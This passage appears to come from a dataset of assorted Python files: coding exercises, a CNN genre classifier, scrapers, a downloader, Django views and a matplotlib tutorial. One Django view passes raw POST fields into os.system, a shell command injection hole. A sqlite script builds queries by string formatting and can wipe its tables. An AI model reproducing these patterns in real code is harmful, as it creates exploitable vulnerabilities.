self._method.assert_called_once_with(\"wlan0\")\n self.assertEqual(value_expected, value_got)\n\n def test_get_mac_address_fail(self):\n\n sut = self._create_sut({\"INTERFACE\": \"invalid_interface\"})\n self._method.return_value = self.WIFI_MAC_ADDRESS\n self._assert_run_throw_config_exception(sut, \"Only wlan0 interface is supported - can't get invalid_interface MAC address\")\n\n # pylint: disable=W0212\n def _create_sut(self, args={}):\n \"\"\"\n Create the SUT with only test step pars\n \"\"\"\n test_args = {\"MAC_ADDR\": self._dest_var}\n test_args.update(args)\n sut = GetMacAddress(None, None, test_args, mock.Mock())\n self._method = sut._api.get_interface_mac_addr\n return sut\n","sub_path":"ACS_v.18.20.4_1/ACS/acs_test_scripts/test/unit_test/UtTestStep/UtDevice/UtWireless/UtCommon/UtIPMgmt/test_GetMacAddress.py","file_name":"test_GetMacAddress.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"644743902","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 18 11:28:50 2018\n\n@author: owen\n\"\"\"\n\n# Given n nodes in a graph labeled from 1 to n. There is no edges in the graph at beginning.\n\n# You need to support the following method:\n\n# connect(a, b), an edge to connect node a and node b\n# query(), Returns the number of connected component in the graph\n\n# 连通块个数, Connecting Graph II 是求每个联通块的节点个数\n\n# similar to Number of Islands II\n\nclass UnionFind(object):\n \n def __init__(self, n):\n self.cnt = n # count of connected component\n self.parents = {}\n for i in range(1, n + 1): # labels are from 1 to n\n self.parents[i] = i \n \n def find(self, x):\n if self.parents[x] != x:\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n \n def union(self, x, y):\n rootx, rooty = self.find(x), self.find(y)\n if rootx != rooty:\n self.parents[rootx] = rooty\n self.cnt -= 1\n\n\nclass ConnectingGraph3:\n \"\"\"\n @param a: An integer\n @param b: An integer\n @return: nothing\n \"\"\"\n def __init__(self, n):\n self.uf = UnionFind(n)\n \n def connect(self, a, b):\n # write your code here\n self.uf.union(a, b)\n \n \"\"\"\n @return: An integer\n \"\"\"\n def query(self):\n # write your code here\n return self.uf.cnt\n \n \n \nif __name__==\"__main__\":\n obj = ConnectingGraph3(5)\n print(obj.query())\n obj.connect(1, 2)\n print(obj.query())\n obj.connect(2, 4)\n print(obj.query())\n obj.connect(1, 4)\n print(obj.query())\n\n obj = ConnectingGraph3(6)\n print(obj.query())\n print(obj.query())\n print(obj.query())\n obj.connect(5, 6)\n print(obj.query())\n obj.connect(1, 4)\n print(obj.query())\n obj.connect(4, 6)\n print(obj.query())\n print(obj.query())\n print(obj.query())\n print(obj.query())\n \n \n \n \n \n \n","sub_path":"Connecting Graph III.py","file_name":"Connecting Graph III.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"165563398","text":"\ndef fibonacci(num): # (int) list\n a, b = 1, 0\n while num != 0:\n a, b = a+b, a\n num -= 1\n return b\n\n# 아래는 테스트로 출력해 보기 위한 코드입니다.\nif __name__ == '__main__':\n print(fibonacci(3)) # 2, [1, 1, 2]\n print(fibonacci(4)) # 3, [1, 1, 2, 3]\n print(fibonacci(6)) # 8, [1, 1, 2, 3, 5, 8]\n","sub_path":"Programmers/01_Level1/005_fibonacci/py-01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"106456433","text":"from datetime import datetime as dt\ndef time_to(useIn):\n if useIn >= 24:\n return \"error\"\n else:\n hour = dt.now().hour\n minute = dt.now().minute\n hour += 1\n hour = useIn - hour\n minute = 60 - minute\n if hour == 0:\n hour = 0\n print(\"fc\")\n return hour,minute\n elif hour < 1:\n next_day_hour = dt.now().hour\n next_day_min = dt.now().minute\n next_day_hour += 1\n next_day_hour = 24 - next_day_hour\n next_day_min = 60 - next_day_min\n next_day_hour += useIn\n print(\"sc\")\n return next_day_hour,minute\n else:\n print(\"tc\")\n return hour,minute\nwhile(True):\n var = input()\n print(time_to(var))\n","sub_path":"website_blocker/time_to.py","file_name":"time_to.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195046443","text":"import warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\nimport librosa\nimport librosa.feature\n\nimport os, glob, math\nimport random\nimport numpy as np\nimport argparse\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, BatchNormalization\nfrom keras.layers import Activation\nfrom keras.utils.np_utils import to_categorical\n\n# Preferences\nCLASS_LABEL = [\"blues\", \"classical\", \"country\", \"disco\", \"hiphop\", \"jazz\", \"metal\", \"pop\", \"reggae\", \"rock\"]\nDATA_FOLDER = 'genres'\n\nTRAIN_TEST_SPLIT = 0.8\nTRAINING_EPOCHS = 80\nBATCH_SIZE = 32\n\nload_weight = False\nsave_weight = True\n\nWEIGHTS_FOLDER = \"./Models\"\nWEIGHTS_FILENAME = \"convnet_weights_default.h5\"\n\ndef extract_features(filename):\n sound, sr = librosa.load(filename)\n\n spectrogram = librosa.feature.melspectrogram(y = sound, sr = sr, n_fft = 2048, hop_length = 512)\n\n # Normalize spectrogram\n spectrogram = librosa.power_to_db(spectrogram, ref = np.max)\n spectrogram = spectrogram[:, :1000]\n\n #print(np.shape(spectrogram))\n\n return np.array(spectrogram)\n\ndef generate_features_labels():\n all_features = []\n all_labels = []\n\n for class_name in CLASS_LABEL:\n print(\"Loading class\", class_name)\n sound_files = glob.glob(DATA_FOLDER + \"/\" + class_name + \"/*.wav\")\n\n for f in sound_files:\n #print(\"Loading file\", f)\n feature = extract_features(f)\n all_features.append(feature)\n all_labels.append(class_name)\n\n # Convert labels to one-hot\n label_unique_ids, label_row_ids = np.unique(all_labels, return_inverse = True)\n label_row_ids = label_row_ids.astype(np.int32, copy = False)\n label_one_hot = to_categorical(label_row_ids, len(label_unique_ids))\n\n return np.stack(all_features), label_one_hot\n\ndef generate_train_test_sets(all_features, all_labels):\n print(\"Features: \", np.shape(all_features))\n print(\"Labels: \", np.shape(all_labels))\n\n index_train = random.sample(list(np.arange(len(all_features))), k=int(len(all_features) * TRAIN_TEST_SPLIT))\n index_test = []\n\n for i in range(len(all_features)):\n if i not in index_train:\n index_test.append(i)\n\n #print(len(index))\n #print(index)\n\n trainX = []\n trainY = []\n testX = []\n testY = []\n\n for i in index_train:\n trainX.append(all_features[i])\n trainY.append(all_labels[i])\n\n for i in index_test:\n testX.append(all_features[i])\n testY.append(all_labels[i])\n\n # Reshape for CNN input\n trainX = np.array([x.reshape((128, 1000, 1)) for x in trainX])\n testX = np.array([x.reshape((128, 1000, 1)) for x in testX])\n trainY = np.array([y.reshape((10)) for y in trainY])\n testY = np.array([y.reshape((10)) for y in testY])\n\n print(np.shape(trainX))\n print(np.shape(trainY))\n print(np.shape(testX))\n print(np.shape(testY))\n\n return trainX, trainY, testX, testY\n\ndef create_model(input_dim, output_dim):\n model = Sequential()\n\n # build network topology\n model = Sequential()\n\n # 1st Conv2D layer\n model.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_dim))\n model.add(MaxPooling2D((3, 3), strides=(2, 2), padding='same'))\n model.add(BatchNormalization())\n\n # 2nd Conv2D layer\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D((3, 3), strides=(2, 2), padding='same'))\n model.add(BatchNormalization())\n\n # 3rd Conv2D layer\n model.add(Conv2D(32, (2, 2), activation='relu'))\n model.add(MaxPooling2D((2, 2), strides=(2, 2), padding='same'))\n model.add(BatchNormalization())\n\n # Flatten output and feed it into dense layer\n model.add(Flatten())\n model.add(Dense(64, activation='relu'))\n model.add(Dropout(0.3))\n\n # Output layer\n model.add(Dense(output_dim, activation='softmax'))\n\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n return model\n\ndef training_session():\n all_features, all_labels = generate_features_labels()\n\n trainX, trainY, testX, testY = generate_train_test_sets(all_features, all_labels)\n\n #print(np.shape(trainX))\n #print(np.shape(trainY))\n\n model = create_model((128, 1000, 1), 10)\n\n if load_weight:\n print(\"Loading previous weight\")\n try:\n model.load_weights(os.path.join(WEIGHTS_FOLDER, WEIGHTS_FILENAME))\n except Exception as e:\n print(\"Error loading weight file\")\n print(e)\n\n model.fit(trainX, trainY, epochs=TRAINING_EPOCHS, batch_size=BATCH_SIZE, verbose=1)\n\n loss, acc = model.evaluate(testX, testY, batch_size=32)\n\n print(\"Loss:\", loss, \"Accuracy:\", acc)\n\n if save_weight:\n print(\"Saving weight\")\n try:\n model.save_weights(WEIGHTS_FOLDER + \"/\" + WEIGHTS_FILENAME)\n except Exception as e:\n print(\"Error saving weight\")\n print(e)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--weight_file\", help=\"Specify weights filename\", default=\"convnet_weights_default.h5\")\n parser.add_argument(\"-ff\", \"--weight_folder\", help=\"Specify where to save weights\", default=\"./Models\")\n parser.add_argument(\"-l\", \"--load\", help=\"Load trained weights (Maybe unstable)\", type=bool, default=False)\n parser.add_argument(\"-ns\", \"--no_save\", help=\"Don't save trained weights\", type=bool, default=False)\n\n args = parser.parse_args()\n\n WEIGHTS_FILENAME = args.weight_file\n WEIGHTS_FOLDER = args.weight_folder\n\n load_weight = args.load\n save_weight = not args.no_save\n\n training_session()","sub_path":"genre-classification-model/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"380515219","text":"'''This document was used for various sqlite setup tasks (and a few other task)\n including, but not limited to, creating, updating, altering, and clearing,\n and deleting tables in the database'''\n\nimport sqlite3\nimport time\nfrom datetime import date\n\ndatabase = sqlite3.connect('munus.db', isolation_level = None)\ndb = database.cursor()\n\na = input('what function do you want to do?')\n\nif a == 'create':\n db.execute('CREATE TABLE orders(user_id INTEGER, product_id INTEGER, wtp INTEGER, expir TIME, id INTEGER PRIMARY KEY);')\n\nif a == 'test':\n print(db.execute('SELECT * FROM orders').fetchall())\n\nif a == 'unique':\n db.execute(\"DROP TABLE history\")\n\nif a == 'display':\n for i in range(1):print(db.execute('SELECT * FROM products ORDER BY id DESC').fetchall()[:10000][i])\n #print(db.execute(\"SELECT * FROM products WHERE store == 'animezakka';\").fetchall()[:10])\n\nif a=='dorm crew':\n db.execute(\"INSERT INTO products (store, name, price, id) VALUES ('dormcrew', 'Toilet Paper', 0, 19988);\")\n\nif a in ['&pizza', 'saloniki','swissbakers','animezakka','crimsoncorner', 'staples', 'thecoop']:\n f = open(a+'.txt', 'r')\n b = f.readline()\n b = f.readline()\n count = 20000\n while b:\n print(b,'this is b')\n b = b.replace('\\n','').split(', ')\n statement = \"INSERT INTO products (store, name, price, id) VALUES (\\\"{0}\\\", \\\"{1}\\\", {2}, {3});\".format(a, b[0], b[1], count)\n print(statement)\n try:\n db.execute(statement)\n except Exception as e:\n print(e)\n b = f.readline()\n count+=1\n\nif a == 'a':\n print(db.execute(\"ALTER TABLE products ADD id INTEGER;\"))\n\nif a == 'x':\n for j in range(19988):\n statement1 = \"SELECT name FROM products ORDER BY name LIMIT 1 OFFSET {0};\".format(j)\n try:\n statement = \"UPDATE products SET id = {0} WHERE name = \\\"{1}\\\";\".format(j, db.execute(statement1).fetchone()[0])\n db.execute(statement)\n except:\n try:\n statement = \"UPDATE products SET id = {0} WHERE name = '{1}';\".format(j, db.execute(statement1).fetchone()[0])\n db.execute(statement)\n except Exception as e:\n print('error',e)\n time.sleep(4)\n if j%1000 == 0:\n print(j)\n\nif a == \"add\":\n db.execute(\"UPDATE users SET money = 10000000 WHERE email = 'a@a.a';\")\n\nif a =='day':\n f = open('day.txt', 'w')\n print(date.today(), file = f)\n f.close()\n\nif a == 'delete':\n db.execute(\"DELETE FROM orders;\")\n db.execute(\"DELETE FROM users\")\n db.execute(\"DELETE FROM history\")\n","sub_path":"one_time.py","file_name":"one_time.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363224656","text":"import json\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom .forms import buyAndSellForm\nimport os\nfrom channels import Group\n\n# Create your views here.\n\n'''def form(request) :\n\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = buyAndSellForm(request.POST)\n # check whether it's valid:\n print(form.errors)\n message = \"Something went Wrong, Try Again please\"\n if form.is_valid():\n # process the data in form.cleaned_data as required\n print(form.cleaned_data[\"Amount\"])\n message = \"Your order is Sended\"\n \n return HttpResponse((json.dumps({'message': message})))\n else:\n form = buyAndSellForm()\n\n return HttpResponse(print(form.errors))'''\n\ndef create_post(request):\n \n if request.method == 'POST':\n\n Limit = request.POST.get('Limit')\n amount = request.POST.get('amount')\n price = request.POST.get('price')\n cmd = request.POST.get('cmd')\n print(cmd)\n print(request.user.username)\n response_data = {}\n\n #\n os.system(\"cd ../scripts && ./book \"+cmd+\" \"+request.user.username+\" \"+price+\" \"+amount)\n os.system(\"cd ../scripts && ./book match\")\n \n # Ask for the reload of Order tables / Chart / Tickers \n result = {}\n result['text'] = 'Data Updated'\n Group(\"update\").send(result)\n\n #We will ask the data in redis in orderAndTrade\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n else:\n return HttpResponse(\n json.dumps({\"nothing to see\": \"this isn't happening\"}),\n content_type=\"application/json\"\n )","sub_path":"mysite/buyAndSell/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439890997","text":"# -*- coding: UTF-8 -*-\nimport os\n\nfrom .request import Request, RequestGroup\nfrom .downloader import Downloader\nfrom .downloader.client import get_client\nfrom .downloader.console import Console\nfrom .downloader.file import File\nfrom .downloader.struct.block import BlockManager\nfrom .downloader.struct.progress import Progress\nfrom .downloader.url.manager import UrlManager\nfrom .error import RequestError, MaxRetriesExceededError, MissingBlockError\nfrom .utils import saver\n\n\ndef dlopen(request, max_retries=None, **configure):\n \"\"\"\n 如果request提供的是str类型,那么将作为下载配置文件的路径读取导入下载器。\n 如果request提供的是Request对象,那么将作为新的下载文件进行处理。\n\n :param\n request : 下载请求对象Request\n max_retries : 最大重试次数\n\n 基本下载配置属性:\n **configure : 下载配置\n max_thread : 下载线程数。\n unit_size : 下载块单元大小。\n max_buff : 最大下载磁盘缓存大小。\n timeout : 客户端连接超时时间。\n :return\n Downloader : 下载器对象\n \"\"\"\n if type(request) is str:\n dl = _dlopen_nbcfg(request, **configure)\n elif isinstance(request, Request):\n dl = _dlopen_request(request, max_retries, **configure)\n elif isinstance(request, RequestGroup):\n dl = _dlopen_group(request, **configure)\n else:\n raise TypeError('参数request不支持的类型。')\n\n return dl\n\n\ndef _dlopen_request(request, max_retries=None, **configure):\n \"\"\" 打开下载请求对象,并构建返回下载对象。\"\"\"\n # :::::建立下载配置,dlopen的配置信息优先于request的配置信息。\n actual_config = request.configure\n # 移除options选项,而是进行更新进来\n actual_config.pop('options')\n # 将额外参数添加到控制台配置的options参数里面,以提供给下载客户端。\n actual_config.update(request.options)\n actual_config.update(configure)\n\n # 预备构建下载对象。\n url = UrlManager()\n # 创建初始化打开进度\n progress = Progress((0,))\n url.open_request(request)\n\n max_retries = max_retries or actual_config.pop('max_retries')\n\n source_wrap = url.get(0)\n\n source = source_wrap.get()\n cli_hdl = get_client(source.protocol)\n\n while True:\n try:\n # 尝试使用下载客户端收集下载对象所需信息。\n cli, name, size, partial = cli_hdl.dlopen(source, progress, True, timeout=request.timeout)\n except RequestError as e:\n if max_retries is None or max_retries > 0:\n continue\n raise MaxRetriesExceededError(e)\n else:\n\n # :::::建立文件File对象\n size = size or float('inf')\n path, request_name = os.path.split(actual_config.pop('file_path'))\n if request_name:\n name = request_name\n overwrite = actual_config.pop('overwrite')\n downloading_extension = actual_config.get('downloading_extension', '.downloading')\n file = File(path, name, size, overwrite=overwrite, downloading_extension=downloading_extension)\n\n # :::::建立下载块实体和管理器对象\n # 更新进度文件信息。\n progress = Progress((0, size))\n # 更新客户端的进度对象,因为这个客户端在后续需要使用。\n cli.progress = progress\n # 构建下载块映射图对象。\n block_mgr = BlockManager(request.unit_size, file.size)\n block_mgr.insert(cli, progress)\n\n # :::::更新下载配置文件路径信息\n if not actual_config['nbcfg']:\n actual_config['nbcfg'] = os.path.join(file.path, file.name) + '.nbcfg'\n # 非partial请求的情况下强制最大线程数1条,避免多开线程。\n if not partial:\n actual_config['max_thread'] = 1\n\n # :::::创建配置控制台。\n console = Console(file, url, block_mgr, partial, **actual_config)\n # 装配下载器\n dl = Downloader(console, True)\n return dl\n\n\ndef _dlopen_nbcfg(request, fix_error=True, **configure):\n \"\"\" 打开nb下载配置文件,并构建返回下载器对象。\"\"\"\n # 下载配置文件路径\n snapshot = saver.load(request, method=('gzip', 'json'))\n console = Console.load(snapshot)\n # 更新下载配置文件。\n configure['nbcfg'] = request\n console.config(**configure)\n dl = Downloader(console, False)\n # 下载配置文件下载块完整性检查。\n missing = dl.block_mgr.integrity_check()\n if missing:\n if not fix_error:\n raise MissingBlockError(missing)\n else:\n # 自动填补缺失的下载块。\n source_wrap = dl.url.get(0)\n source = source_wrap.get()\n for r in missing:\n progress = Progress(r)\n client = get_client(source_wrap).dlopen(source, progress, True, timeout=dl.body.config['timeout'])\n dl.block_mgr.insert(client, progress)\n\n return dl\n\n\ndef _dlopen_group(request_group, **configure):\n \"\"\" 打开请求组建立下载管理池。\"\"\"\n from .manager.manager import Manager\n config = request_group.configure\n config.update(configure)\n mgr = Manager(**config)\n for request in request_group:\n mgr.putrequest(request)\n\n return mgr\n","sub_path":"nbdler/_api.py","file_name":"_api.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"134355005","text":"import requests\nimport json\nimport sys\nfrom db_connector import mysql_db\n\ncodes = json.load(open('codes.json', encoding='utf-8'))\nmysql_conn = mysql_db()\n\n\nfor num, code_dic in enumerate(codes):\n print(num, len(codes))\n data_list = list()\n url = 'https://finance.daum.net/api/charts/{}/days?limit=730&adjusted=true'\n referer = 'http://finance.daum.net/quotes/{}}'\n code = code_dic['symbolCode']\n url_added_code = url.format(code)\n referer_added_code = url.format(code)\n headers = {\n 'Referer': referer_added_code,\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n }\n\n data = requests.get(url_added_code,headers=headers)\n json_data = json.loads(data.text)\n '''\n date : 날짜\n openingPrice : 시가\n tradePrice : 종가\n highPrice : 고가\n lowPrice : 저가\n candleAccTradeVolume : 거래량\n '''\n datas = json_data['data']\n for data in datas:\n #dt = datetime.datetime.strptime(data['date'], '%Y-%m-%d')\n data_dict = {\n 'stock_name': code_dic['name'],\n 'stock_date': data['date'],\n 'open_price': data['openingPrice'],\n 'close_price': data['tradePrice'],\n 'high_price': data['highPrice'],\n 'low_price': data['lowPrice'],\n 'day_volume': data['candleAccTradeVolume'],\n }\n data_list.append(data_dict)\n\n mysql_conn.insert_dump_dict('stock_info', data_list)\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"353920954","text":"from flask import current_app\nfrom sqlalchemy import func\n\nfrom nptimelapse.extensions import celery, db\nfrom nptimelapse.map_maker import Map\nfrom nptimelapse.model import Game, Star, Owner\n\nimport logging\nimport os\nimport os.path\nimport glob\nfrom math import sqrt\nimport moviepy.editor as mpy\n\n\n# Errors\nclass TimelapseError(Exception):\n pass\n\nclass TimelapseGameNotRegisteredError(TimelapseError):\n def __init__(self, game_id):\n self.game_id = game_id\n super().__init__(self, f'Game {game_id} is not registered')\n\nclass TimelapseTmpFolderExistsError(TimelapseError):\n def __init__(self, path):\n self.path = path\n super().__init__(self, f'tmp folder already exists at {path}')\n\n\n@celery.task\ndef make_timelapse(game_id, tl_path, map_config={}):\n logging.basicConfig(format='%(asctime)s|%(levelname)s| %(message)s',\n filename=os.path.join(current_app.instance_path, 'vid_gen.log'),\n level=logging.INFO)\n logging.info(f'Generat timelapse {game_id}')\n \n # Make sure the video cache exists\n video_cache = os.path.join(current_app.instance_path, 'video_cache')\n if not os.path.exists(video_cache):\n os.mkdir(video_cache)\n\n # Get basic game info\n game_data = db.session.query(func.min(Owner.tick), func.max(Owner.tick), Game) \\\n .filter(Game.id == game_id).join(Game.owners).group_by(Game.id).one_or_none()\n if game_data is None:\n logging.error(f'Attempt to generate unregistered game {game_id}')\n raise TimelapseGameNotRegisteredError(game_id)\n start_tick, end_tick, game = game_data\n tl_path = os.path.join(video_cache, f'{tl_path}')\n\n # Check for tmp folder to see if the timelapse is not being created by another worker\n tmp_folder = os.path.join(video_cache, f'tmp')\n if os.path.exists(tmp_folder):\n logging.error('tmp folder exists. Abort generation.')\n raise TimelapseTmpFolderExistsError(tmp_folder)\n os.mkdir(tmp_folder)\n\n # Prepare the map\n logging.info('Generation start...')\n stars = Star.query.filter(Star.game_id == game_id).all()\n m = Map(stars, **map_config)\n\n # Generate images\n for tick in range(start_tick, end_tick + 1):\n if tick % 24 == 0:\n logging.info(f'Generating tick {tick}')\n owners = Owner.query.filter(Owner.game_id == game_id) \\\n .filter(Owner.tick == tick).all()\n if owners:\n m.update(owners)\n m.save(os.path.join(tmp_folder, f'{tick:04}.png'))\n\n # Make a video\n logging.info('Rendering video')\n images = glob.glob(os.path.join(tmp_folder, '*.png'))\n images.sort()\n video = mpy.ImageSequenceClip(images, fps=24)\n video.write_videofile(tl_path)\n \n # Cleanup the tmp_folder\n logging.info('Cleanup')\n for image in images:\n os.remove(image)\n os.rmdir(tmp_folder)\n logging.info('Generation successfull')\n\n return\n","sub_path":"nptimelapse/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399766105","text":"from django.db import models\r\nfrom django.utils.text import slugify\r\nfrom django.utils.translation import ugettext, ugettext_lazy as _\r\nfrom unidecode import unidecode\r\nfrom project import settings\r\nimport os\r\n\r\n\r\ndef imageFilename(self, filename):\r\n ext = filename.split('.')[-1]\r\n app_name = self._meta.app_label\r\n model_name = self._meta.model_name\r\n name_attrs = ['id'+str(self.pk)]\r\n name = ''\r\n parent = self\r\n models_attrs = ['slug','code']\r\n while parent != None:\r\n for attr in models_attrs:\r\n if hasattr(parent, attr):\r\n if getattr(parent, attr) != None:\r\n name_attrs.insert(0, str(getattr(parent, attr)))\r\n if hasattr(parent, 'brand'):\r\n name_attrs.insert(0, str(parent.brand.slug))\r\n if hasattr(parent, 'parent'):\r\n parent = parent.parent\r\n else:\r\n parent = None\r\n name = '_'.join(name_attrs)\r\n name = slugify(str(name))\r\n \r\n # APP NAME PATH\r\n app_name_path = settings.MEDIA_ROOT + app_name + '/'\r\n app_name_dir = os.path.isdir(app_name_path)\r\n if app_name_dir == False:\r\n os.mkdir(app_name_path)\r\n\r\n # MODEL NAME PATH\r\n model_name_path = settings.MEDIA_ROOT + app_name + '/' + model_name + '/'\r\n model_name_dir = os.path.isdir(model_name_path)\r\n if model_name_dir == False:\r\n os.mkdir(model_name_path)\r\n path = '/'.join([app_name, model_name])\r\n return path, name, ext\r\n\r\n\r\nclass OneFile(models.Model):\r\n num = models.PositiveIntegerField(default=0, blank=True, verbose_name=_(\"Номер\"))\r\n name = models.CharField(max_length=100, blank=True, default=\"\", verbose_name=_(\"Название\"))\r\n slug = models.CharField(max_length=250, blank=True, null=True, verbose_name=_(\"Иденитификатор\"), editable=False)\r\n file = models.FileField(upload_to='temp', blank=False, null=True)\r\n file_url = models.CharField(max_length=1000, blank=True, editable=False)\r\n ext = models.CharField(max_length=100, blank=True, editable=False, verbose_name=_(\"file extension\"))\r\n\r\n class Meta:\r\n ordering = ['-num']\r\n abstract = True\r\n\r\n def save(self):\r\n \r\n super(OneFile, self).save()\r\n\r\n if len(self.name) == 0:\r\n try:\r\n modelName = self.__class__._meta.verbose_name.title()\r\n self.name = ' '.join([modelName, self.product.category.name, self.product.name, self.product.code])\r\n except:\r\n self.name = self.__class__.__name__\r\n \r\n\r\n self.slug = slugify(unidecode(self.name) + '-' + str(self.pk))\r\n if self.file.url != '/media/' + self.file_url:\r\n path, name, ext = imageFilename(self, self.file.name)\r\n self.ext = ext.lower()\r\n \r\n # f_name = \r\n\r\n filename = f'{path}/{self.slug}.{ext}'\r\n tempFile = self.file.name\r\n with open(settings.MEDIA_ROOT + self.file.name, \"rb\") as f1:\r\n raw = f1.read()\r\n with open(settings.MEDIA_ROOT + filename, 'wb') as f:\r\n f.write(raw)\r\n\r\n setattr(getattr(self, 'file'), 'name', filename)\r\n setattr(self, 'file_url', filename)\r\n\r\n try: os.remove(settings.MEDIA_ROOT + tempFile)\r\n except: pass\r\n \r\n super(OneFile, self).save()\r\n\r\n\r\n def delete(self):\r\n try:\r\n os.remove(settings.MEDIA_ROOT + self.file.name)\r\n except: pass\r\n super(OneFile, self).delete()","sub_path":"apps/core/models/models__file.py","file_name":"models__file.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237680696","text":"import spacy\nimport pandas as pd\nfrom IPython.display import display\n\ndef tokens_to_df(doc, properties=None, is_display=True):\n \n texts = [token.text for token in doc] \n index = [token.i for token in doc] \n if properties is None:\n properties = ['text', 'i', 'idx', 'text_with_ws', 'is_sent_start', 'is_sent_end', \n 'head', 'dep_', 'ent_type_', 'tag_', 'lemma_', \n 'norm_', 'is_stop', 'is_oov', ('tag_explain', token_explain('tag_'))]\n columns = [property_ if isinstance(property_, str) else property_[0] \n for property_ in properties] \n df_token = pd.DataFrame(columns = columns,\n index = index) \n for token in doc: \n for property_ in properties:\n if isinstance(property_, str): \n df_token.loc[token.i, property_] = getattr(token, property_)\n else:\n df_token.loc[token.i, property_[0]] = property_[1](token)\n \n if is_display:\n df_token = df_token.style.set_properties(**{'text-align': 'left'}) \n display(df_token)\n return df_token\n\ndef tokens_to_sheet(doc, properties=None):\n if properties is None:\n properties = [('text', 15), ('tag_', 15), ('head', 15), ('dep_', 15), \n (('tag_explain', token_explain('tag_')), 30)]\n \n headers = [property_ if isinstance(property_, str) else property_[0] \n for property_, width in properties]\n widths = [width for _, width in properties]\n header_text = ''.join([f'{header:<{width}}' for header, width in zip(headers, widths)]) \n \n row_texts =[]\n for token in doc: \n column_values = []\n for property_, width in properties:\n if isinstance(property_, str): \n column_values.append(str(getattr(token, property_)))\n else:\n column_values.append(str(property_[1](token)))\n row_text = ''.join([f'{value:<{width}}' for value, width in zip(column_values, widths)])\n row_texts.append(row_text)\n \n print(header_text)\n max_len = max([len(row_text) for row_text in row_texts]) + 2\n print('-'*max_len)\n for row_text in row_texts:\n print(row_text) \n \n\ndef token_explain(property_):\n def explain(token):\n return spacy.explain(getattr(token, property_)) \n return explain\n\n\n","sub_path":"_notes/05-ai/45-nlp/spacy/mastering_spacy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"192448766","text":"\"\"\"\nLet's annotate some interesting points using the annotate\ncommand. We chose the 2pi/3 value and we want to annotate both\nthe sine and the cosine. We'll first draw a marker on the curve\nas well as a straight dotted line. Then, we'll use the annotate\ncommand to display some text with an arrow.\nIf your dashed lines don't quite match the goal, try drawing\nthem in the opposite direction.\n:lesson goal file: goal08.py\n\"\"\"\n\n# Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(-np.pi, np.pi, 256, endpoint=True)\nc, s = np.cos(x), np.sin(x)\n\n# Plot cosine using blue color with a continuous line of width 2 (pixels)\nplt.plot(x, c, color=\"blue\", linewidth=2.0, linestyle=\"-\", label='cosine')\n\n# Plot sine using red color with a continuous line of width 2 (pixels)\nplt.plot(x, s, color=\"red\", linewidth=2.0, linestyle=\"-\", label='sine')\n\nplt.legend(loc='upper left', frameon=False)\n\nt = 2*np.pi/3\nplt.plot([t, t/2], [-1, -0.2], color='blue', linewidth=1.5, linestyle=\"--\")\nplt.scatter([t/2], [-0.2], 50, color='blue')\n\nplt.annotate(r'$\\cos(\\frac{2\\pi}{3})=-\\frac{1}{2}$',\n xy=(t, np.cos(t)), xycoords='data',\n xytext=(-90, -50), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"-|>\", connectionstyle=\"arc3,rad=.2\"))\n\nplt.plot([t, t], [0, np.sin(t)], color='red', linewidth=1.5, linestyle=\":\")\nplt.scatter([t], [np.sin(t)], 50, color='red')\n\nplt.annotate(r'$\\sin(\\frac{2\\pi}{30})=\\frac{\\sqrt{3}}{2}$',\n xy=(t, np.sin(t)), xycoords='data',\n xytext=(+10, +30), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", connectionstyle=\"arc3,rad=.2\"))\n\n# Set x limits\nplt.xlim(x.min()*1.1, x.max()*1.1)\n\n# Set x 